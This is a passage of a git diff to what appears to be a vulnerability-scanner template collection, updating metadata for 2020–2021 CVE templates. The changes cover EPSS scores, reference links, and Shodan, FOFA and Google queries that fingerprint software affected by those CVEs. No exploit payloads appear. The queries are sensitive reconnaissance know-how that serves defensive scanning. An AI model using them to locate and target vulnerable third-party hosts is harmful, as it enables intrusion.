http.html:"/_next/static" + - cpe:"cpe:2.3:a:zeit:next.js" fofa-query: body="/_next/static" tags: cve,cve2020,nextjs,lfi,zeit diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index 450854ca58..1099d740c0 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -20,14 +20,16 @@ info: cvss-score: 8.8 cve-id: CVE-2020-5776 cwe-id: CWE-352 - epss-score: 0.50353 - epss-percentile: 0.97455 + epss-score: 0.42595 + epss-percentile: 0.97329 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: magmi_project product: magmi - shodan-query: http.component:"Magento" + shodan-query: + - http.component:"Magento" + - http.component:"magento" tags: cve,cve2020,magmi,magento,tenable,magmi_project http: diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index 23c5cf6e86..d22583dc5b 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: magmi_project product: magmi - shodan-query: http.component:"Magento" + shodan-query: + - http.component:"Magento" + - http.component:"magento" tags: cve,cve2020,plugin,tenable,magmi,magento,auth,bypass,magmi_project http: diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index b26d0b6feb..b7517b13ca 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -28,7 +28,7 @@ info: cve-id: CVE-2020-5902 cwe-id: CWE-22 epss-score: 0.97563 - epss-percentile: 0.99998 + epss-percentile: 0.99999 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 8 diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index 332f8a554d..e6b1a0896b 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -27,7 +27,9 @@ info: max-request: 3 vendor: os4ed product: opensis - shodan-query: http.title:"openSIS" + shodan-query: + - http.title:"openSIS" + - http.title:"opensis" fofa-query: title="opensis" google-query: intitle:"opensis" tags: cve,cve2020,sqli,opensis,os4ed diff --git a/http/cves/2020/CVE-2020-6950.yaml b/http/cves/2020/CVE-2020-6950.yaml index ee66ec22f5..3365889c1a 100644 --- a/http/cves/2020/CVE-2020-6950.yaml +++ b/http/cves/2020/CVE-2020-6950.yaml @@ -25,8 +25,14 @@ info: max-request: 4 vendor: eclipse product: mojarra - shodan-query: html:"javax.faces.resource" - fofa-query: body="javax.faces.ViewState" + shodan-query: + - html:"javax.faces.resource" + - http.html:"javax.faces.viewstate" + - http.html:"javax.faces.resource" + fofa-query: + - body="javax.faces.ViewState" + - body="javax.faces.viewstate" + - body="javax.faces.resource" tags: cve,cve2020,mojarra,lfi,eclipse http: diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index ff117d3bab..d8b877f9af 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -25,9 +25,9 @@ info: cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: etoilewebdesign - product: ultimate_faq + product: "ultimate_faq" framework: wordpress tags: cve,cve2020,ultimate-faqs,wpscan,xss,wordpress,wp-plugin,wp,etoilewebdesign flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml index 01f5f8602f..e26cc89c6e 100644 --- a/http/cves/2020/CVE-2020-7209.yaml +++ b/http/cves/2020/CVE-2020-7209.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-7209 - epss-score: 0.97202 - epss-percentile: 0.99806 + epss-score: 0.97227 + epss-percentile: 0.99837 cpe: cpe:2.3:a:hp:linuxki:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index a94955d0cc..23f82f7dd5 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -27,9 +27,15 @@ info: max-request: 1 vendor: synacor product: zimbra_collaboration_suite - shodan-query: http.title:"zimbra collaboration suite" - fofa-query: title="zimbra web client sign in" - google-query: intitle:"zimbra collaboration suite" + shodan-query: + - http.title:"zimbra collaboration suite" + - http.title:"zimbra web client sign in" + fofa-query: + - title="zimbra web client sign in" + - title="zimbra collaboration suite" + google-query: + - intitle:"zimbra collaboration suite" + - intitle:"zimbra web client sign in" tags: cve,cve2020,zimbra,ssrf,oast,synacor http: diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index a7628b92cc..7604f752bd 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -25,7 +25,9 @@ info: max-request: 2 vendor: liferay product: liferay_portal - shodan-query: http.favicon.hash:129457226 + shodan-query: + - http.favicon.hash:129457226 + - cpe:"cpe:2.3:a:liferay:liferay_portal" fofa-query: icon_hash=129457226 tags: cve2020,cve,packetstorm,rce,liferay,kev diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index 506042020a..fce505e70b 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: intelliantech product: aptus_web - shodan-query: http.title:"Intellian Aptus Web" + shodan-query: + - http.title:"Intellian Aptus Web" + - http.title:"intellian aptus web" fofa-query: title="intellian aptus web" google-query: intitle:"intellian aptus web" tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index 80dc34b36e..e1e5d6f28c 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: revive-adserver product: revive_adserver - shodan-query: http.title:"revive adserver" - fofa-query: icon_hash=106844876 + shodan-query: + - http.title:"revive adserver" + - http.favicon.hash:106844876 + fofa-query: + - icon_hash=106844876 + - title="revive adserver" google-query: intitle:"revive adserver" tags: cve,cve2020,xss,hackerone,revive-adserver diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml index 785afaac1a..632abbc14f 100644 --- a/http/cves/2020/CVE-2020-8194.yaml +++ b/http/cves/2020/CVE-2020-8194.yaml @@ -12,13 +12,16 @@ info: reference: - https://support.citrix.com/article/CTX276688 - https://nvd.nist.gov/vuln/detail/CVE-2020-8194 + - https://github.com/Elsfa7-110/kenzer-templates + - https://github.com/SexyBeast233/SecBooks + - https://github.com/merlinepedra/nuclei-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2020-8194 cwe-id: CWE-94 - epss-score: 0.90775 - epss-percentile: 0.98597 + epss-score: 0.97364 + epss-percentile: 0.999 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index e68eb53a12..58bcefc965 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: icewarp product: icewarp_server - shodan-query: title:"icewarp" + shodan-query: + - title:"icewarp" + - http.title:"icewarp" fofa-query: title="icewarp" google-query: intitle:"icewarp" tags: cve,cve2020,edb,packetstorm,xss,icewarp diff --git a/http/cves/2020/CVE-2020-8615.yaml b/http/cves/2020/CVE-2020-8615.yaml index 5e053f6840..c77d957110 100644 --- a/http/cves/2020/CVE-2020-8615.yaml +++ b/http/cves/2020/CVE-2020-8615.yaml @@ -27,9 +27,9 @@ info: vendor: themeum product: tutor_lms framework: wordpress - publicwww-query: /wp-content/plugins/tutor/ shodan-query: http.html:/wp-content/plugins/tutor/ fofa-query: body=/wp-content/plugins/tutor/ + publicwww-query: /wp-content/plugins/tutor/ tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum variables: user: "{{rand_base(6)}}" diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index 9f41122e5c..937a6bb474 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8654 cwe-id: CWE-78 - epss-score: 0.04987 - epss-percentile: 0.92656 + epss-score: 0.04806 + epss-percentile: 0.92702 cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml index c98c2542b7..bfc480a7a1 100644 --- a/http/cves/2020/CVE-2020-8771.yaml +++ b/http/cves/2020/CVE-2020-8771.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-8771 - https://wpvulndb.com/vulnerabilities/10010 - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/ + - https://github.com/HycCodeQL/wordpress classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-8771 cwe-id: CWE-287 - epss-score: 0.07621 - epss-percentile: 0.93504 + epss-score: 0.06911 + epss-percentile: 0.93911 cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index 65de4d1037..3875c074d1 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -27,9 +27,17 @@ info: max-request: 1 vendor: cacti product: cacti - fofa-query: icon_hash="-1797138069" - shodan-query: http.title:"login to cacti" - google-query: intitle:"cacti" + shodan-query: + - http.title:"login to cacti" + - http.title:"cacti" + - http.favicon.hash:"-1797138069" + fofa-query: + - icon_hash="-1797138069" + - title="cacti" + - title="login to cacti" + google-query: + - intitle:"cacti" + - intitle:"login to cacti" tags: cve2020,cve,cacti,rce,oast http: diff --git a/http/cves/2020/CVE-2020-9054.yaml b/http/cves/2020/CVE-2020-9054.yaml index f605722b0a..69ef94b227 100644 --- a/http/cves/2020/CVE-2020-9054.yaml +++ b/http/cves/2020/CVE-2020-9054.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-9054 cwe-id: CWE-78 - epss-score: 0.96978 - epss-percentile: 0.99679 + epss-score: 0.96901 + epss-percentile: 0.9971 cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index 0e2ba0e428..f1d02baa52 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -28,7 +28,9 @@ info: max-request: 5 vendor: atlassian product: subversion_application_lifecycle_management - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve2020,cve,atlassian,jira,xss http: diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml index c884944e53..0d3dec9f23 100644 --- a/http/cves/2020/CVE-2020-9484.yaml +++ b/http/cves/2020/CVE-2020-9484.yaml @@ -26,15 +26,21 @@ info: cvss-score: 7 cve-id: CVE-2020-9484 cwe-id: CWE-502 - epss-score: 0.92769 - epss-percentile: 0.98967 + epss-score: 0.92247 + epss-percentile: 0.98942 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: tomcat - shodan-query: title:"Apache Tomcat" - fofa-query: body="apache tomcat" + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" google-query: intitle:"apache tomcat" tags: cve2020,cve,rce,packetstorm,apache,tomcat diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml index 109b73e9ec..ddd08cddf8 100644 --- a/http/cves/2020/CVE-2020-9496.yaml +++ b/http/cves/2020/CVE-2020-9496.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: apache product: ofbiz - fofa-query: body="ofbiz" - shodan-query: http.html:"ofbiz" + shodan-query: + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - body="ofbiz" + - app="apache_ofbiz" tags: cve,cve2020,ofbiz,packetstorm,apache,java http: diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml index 8f7142b88b..65511769b2 100644 --- a/http/cves/2020/CVE-2020-9757.yaml +++ b/http/cves/2020/CVE-2020-9757.yaml @@ -20,16 +20,21 @@ info: cvss-score: 9.8 cve-id: CVE-2020-9757 cwe-id: CWE-74 - epss-score: 0.96518 - epss-percentile: 0.99576 + epss-score: 0.96294 + epss-percentile: 0.99536 cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: craftcms product: craft_cms + shodan-query: + - cpe:"cpe:2.3:a:craftcms:craft_cms" + - http.html:craftcms + - http.favicon.hash:-47932290 + fofa-query: + - icon_hash=-47932290 + - body=craftcms publicwww-query: craftcms - shodan-query: cpe:"cpe:2.3:a:craftcms:craft_cms" - fofa-query: icon_hash=-47932290 tags: cve,cve2020,ssti,craftcms http: diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index 5b1c40cd40..2d0e473156 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: cisco product: rv160_firmware - shodan-query: http.html:"Cisco rv340" + shodan-query: + - http.html:"Cisco rv340" + - http.html:"cisco rv340" fofa-query: body="cisco rv340" tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive diff --git a/http/cves/2021/CVE-2021-20092.yaml b/http/cves/2021/CVE-2021-20092.yaml index 79459c085f..5ed53acfe4 100644 --- a/http/cves/2021/CVE-2021-20092.yaml +++ b/http/cves/2021/CVE-2021-20092.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-20092 cwe-id: CWE-287 epss-score: 0.01583 - epss-percentile: 0.87054 + epss-percentile: 0.87312 cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index 61550d85a1..1bd968d834 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: draytek product: vigorconnect - shodan-query: http.html:"VigorConnect" + shodan-query: + - http.html:"VigorConnect" + - http.html:"vigorconnect" fofa-query: body="vigorconnect" tags: cve2021,cve,draytek,lfi,vigorconnect,tenable diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index 5be447025c..e78ee9df03 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: draytek product: vigorconnect - shodan-query: http.html:"VigorConnect" + shodan-query: + - http.html:"VigorConnect" + - http.html:"vigorconnect" fofa-query: body="vigorconnect" tags: cve2021,cve,draytek,lfi,vigorconnect,tenable diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index 9404822723..c18c636861 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -24,7 +24,9 @@ info: max-request: 1 vendor: trendnet product: tew-827dru_firmware - shodan-query: http.html:"TEW-827DRU" + shodan-query: + - http.html:"TEW-827DRU" + - http.html:"tew-827dru" fofa-query: body="tew-827dru" tags: cve2021,cve,disclosure,router,tenable,trendnet diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index 17181f13bd..d95ec60a1c 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -12,19 +12,23 @@ info: reference: - https://www.tenable.com/security/research/tra-2021-54 - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-20158 cwe-id: CWE-306 epss-score: 0.01211 - epss-percentile: 0.83754 + epss-percentile: 0.8522 cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: max-request: 2 vendor: trendnet product: tew-827dru_firmware - shodan-query: http.html:"TEW-827DRU" + shodan-query: + - http.html:"TEW-827DRU" + - http.html:"tew-827dru" fofa-query: body="tew-827dru" tags: cve2021,cve,disclosure,router,intrusive,tenable,trendnet variables: diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index ab5ea8fd80..1c5cf64515 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -30,8 +30,15 @@ info: max-request: 4 vendor: redhat product: keycloak - shodan-query: html:"Keycloak" - fofa-query: title="keycloak" + shodan-query: + - html:"Keycloak" + - http.title:"keycloak" + - http.html:"keycloak" + - http.favicon.hash:-1105083093 + fofa-query: + - title="keycloak" + - icon_hash=-1105083093 + - body="keycloak" google-query: intitle:"keycloak" tags: cve2021,cve,keycloak,xss,redhat diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml index ef1406f42d..d92e4a1152 100644 --- a/http/cves/2021/CVE-2021-20837.yaml +++ b/http/cves/2021/CVE-2021-20837.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: sixapart product: movable_type - shodan-query: http.title:"サインイン | movable type pro" + shodan-query: + - http.title:"サインイン | movable type pro" + - cpe:"cpe:2.3:a:sixapart:movable_type" fofa-query: title="サインイン | movable type pro" google-query: intitle:"サインイン | movable type pro" tags: cve2021,cve,packetstorm,rce,movable,sixapart diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index efd063967d..310e5132d8 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -28,8 +28,14 @@ info: max-request: 7 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: title="coldfusion administrator login" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" tags: cve2021,cve,xss,adobe,misc,coldfusion diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml index fc37f12b07..9f03d719b2 100644 --- a/http/cves/2021/CVE-2021-21287.yaml +++ b/http/cves/2021/CVE-2021-21287.yaml @@ -27,9 +27,17 @@ info: max-request: 1 vendor: minio product: minio - shodan-query: http.title:"minio browser" - fofa-query: title="minio console" - google-query: intitle:"minio browser" + shodan-query: + - http.title:"minio browser" + - cpe:"cpe:2.3:a:minio:minio" + - http.title:"minio console" + fofa-query: + - title="minio console" + - app="minio" + - title="minio browser" + google-query: + - intitle:"minio browser" + - intitle:"minio console" tags: cve,cve2021,minio,ssrf,oast http: diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index c9271506d0..32863651fc 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -26,10 +26,18 @@ info: max-request: 6 vendor: adminer product: adminer - shodan-query: title:"Login - Adminer" - fofa-query: app="Adminer" && body="4.7.8" - hunter-query: app.name="Adminer"&&web.body="4.7.8" + shodan-query: + - title:"Login - Adminer" + - cpe:"cpe:2.3:a:adminer:adminer" + - http.title:"login - adminer" + fofa-query: + - app="Adminer" && body="4.7.8" + - title="login - adminer" + - app="adminer" && body="4.7.8" google-query: intitle:"login - adminer" + hunter-query: + - app.name="Adminer"&&web.body="4.7.8" + - app.name="adminer"&&web.body="4.7.8" tags: cve2021,cve,adminer,ssrf http: diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml index 5b4343b512..7fd548be5d 100644 --- a/http/cves/2021/CVE-2021-21402.yaml +++ b/http/cves/2021/CVE-2021-21402.yaml @@ -28,8 +28,15 @@ info: max-request: 2 vendor: jellyfin product: jellyfin - shodan-query: http.html:"Jellyfin" - fofa-query: title="Jellyfin" || body="http://jellyfin.media" + shodan-query: + - http.html:"Jellyfin" + - http.html:"jellyfin" + - http.title:"jellyfin" + fofa-query: + - title="Jellyfin" || body="http://jellyfin.media" + - title="jellyfin" + - body="jellyfin" + - title="jellyfin" || body="http://jellyfin.media" google-query: intitle:"jellyfin" tags: cve,cve2021,jellyfin,lfi diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml index f24355aa4a..4e2c211b24 100644 --- a/http/cves/2021/CVE-2021-21799.yaml +++ b/http/cves/2021/CVE-2021-21799.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: advantech product: r-seenet - shodan-query: http.html:"R-SeeNet" + shodan-query: + - http.html:"R-SeeNet" + - http.html:"r-seenet" fofa-query: body="r-seenet" tags: cve2021,cve,xss,r-seenet,advantech diff --git a/http/cves/2021/CVE-2021-21800.yaml b/http/cves/2021/CVE-2021-21800.yaml index c062217bfa..c9fe1fe821 100644 --- a/http/cves/2021/CVE-2021-21800.yaml +++ b/http/cves/2021/CVE-2021-21800.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: advantech product: r-seenet - shodan-query: http.html:"R-SeeNet" + shodan-query: + - http.html:"R-SeeNet" + - http.html:"r-seenet" fofa-query: body="r-seenet" tags: cve2021,cve,xss,r-seenet,advantech diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index e258ea3eb1..d0d64995f3 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: advantech product: r-seenet - shodan-query: http.html:"R-SeeNet" + shodan-query: + - http.html:"R-SeeNet" + - http.html:"r-seenet" fofa-query: body="r-seenet" tags: cve2021,cve,rce,r-seenet,advantech diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml index a7ad7f0a67..2fb236dcda 100644 --- a/http/cves/2021/CVE-2021-21985.yaml +++ b/http/cves/2021/CVE-2021-21985.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21985 cwe-id: CWE-20 - epss-score: 0.97407 - epss-percentile: 0.9992 + epss-score: 0.97371 + epss-percentile: 0.99903 cpe: cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index cf1cf472fe..de88f2140b 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: vmware product: workspace_one_uem_console - fofa-query: banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx" + fofa-query: + - banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx" + - banner="/airwatch/default.aspx" || header="/airwatch/default.aspx" tags: cve2021,cve,vmware,workspace,ssrf http: diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index c071ecba55..a46c7b7cb5 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -28,6 +28,9 @@ info: max-request: 2 vendor: fortinet product: fortiweb + shodan-query: http.title:"fortiweb - " + fofa-query: title="fortiweb - " + google-query: intitle:"fortiweb - " tags: cve2021,cve,fortiweb,xss,fortinet http: diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml index 7acd120f1e..82d559627d 100644 --- a/http/cves/2021/CVE-2021-22205.yaml +++ b/http/cves/2021/CVE-2021-22205.yaml @@ -22,14 +22,17 @@ info: cvss-score: 10 cve-id: CVE-2021-22205 cwe-id: CWE-94 - epss-score: 0.97333 - epss-percentile: 0.99868 + epss-score: 0.97463 + epss-percentile: 0.99959 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 vendor: gitlab product: gitlab - shodan-query: http.title:"GitLab" + shodan-query: + - http.title:"GitLab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve2021,cve,kev,hackerone,gitlab,rce diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml index c7acf1110c..7d701316f2 100644 --- a/http/cves/2021/CVE-2021-22214.yaml +++ b/http/cves/2021/CVE-2021-22214.yaml @@ -31,7 +31,10 @@ info: max-request: 1 vendor: gitlab product: gitlab - shodan-query: http.title:"GitLab" + shodan-query: + - http.title:"GitLab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve2021,cve,gitlab,ssrf diff --git a/http/cves/2021/CVE-2021-22502.yaml b/http/cves/2021/CVE-2021-22502.yaml index cb68b9daba..58e3ddb280 100644 --- a/http/cves/2021/CVE-2021-22502.yaml +++ b/http/cves/2021/CVE-2021-22502.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-22502 cwe-id: CWE-78 - epss-score: 0.95993 - epss-percentile: 0.99434 + epss-score: 0.96085 + epss-percentile: 0.99492 cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml index 20ad76d934..786823e519 100644 --- a/http/cves/2021/CVE-2021-22707.yaml +++ b/http/cves/2021/CVE-2021-22707.yaml @@ -25,8 +25,12 @@ info: max-request: 1 vendor: schneider-electric product: evlink_city_evc1s22p4_firmware - shodan-query: title:"EVSE web interface" - fofa-query: title="EVSE web interface" + shodan-query: + - title:"EVSE web interface" + - http.title:"evse web interface" + fofa-query: + - title="EVSE web interface" + - title="evse web interface" google-query: intitle:"evse web interface" tags: cve2021,cve,evlink,auth-bypass,schneider-electric diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index fde9c3bb60..ecde7adfb4 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -28,8 +28,12 @@ info: max-request: 6 vendor: revive-adserver product: revive_adserver - shodan-query: http.favicon.hash:106844876 - fofa-query: icon_hash=106844876 + shodan-query: + - http.favicon.hash:106844876 + - http.title:"revive adserver" + fofa-query: + - icon_hash=106844876 + - title="revive adserver" google-query: intitle:"revive adserver" tags: cve2021,cve,hackerone,seclists,packetstorm,redirect,revive,revive-adserver diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index 15294b2567..08cd4cf267 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: rocket.chat product: rocket.chat - shodan-query: http.title:"Rocket.Chat" + shodan-query: + - http.title:"Rocket.Chat" + - http.title:"rocket.chat" fofa-query: title="rocket.chat" google-query: intitle:"rocket.chat" tags: cve2021,cve,rocketchat,nosqli,packetstorm,vulhub,hackerone,rocket.chat,sqli diff --git a/http/cves/2021/CVE-2021-24155.yaml b/http/cves/2021/CVE-2021-24155.yaml index 244295f61e..c012723a81 100644 --- a/http/cves/2021/CVE-2021-24155.yaml +++ b/http/cves/2021/CVE-2021-24155.yaml @@ -14,13 +14,14 @@ info: - https://wordpress.org/plugins/backup/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24155 - 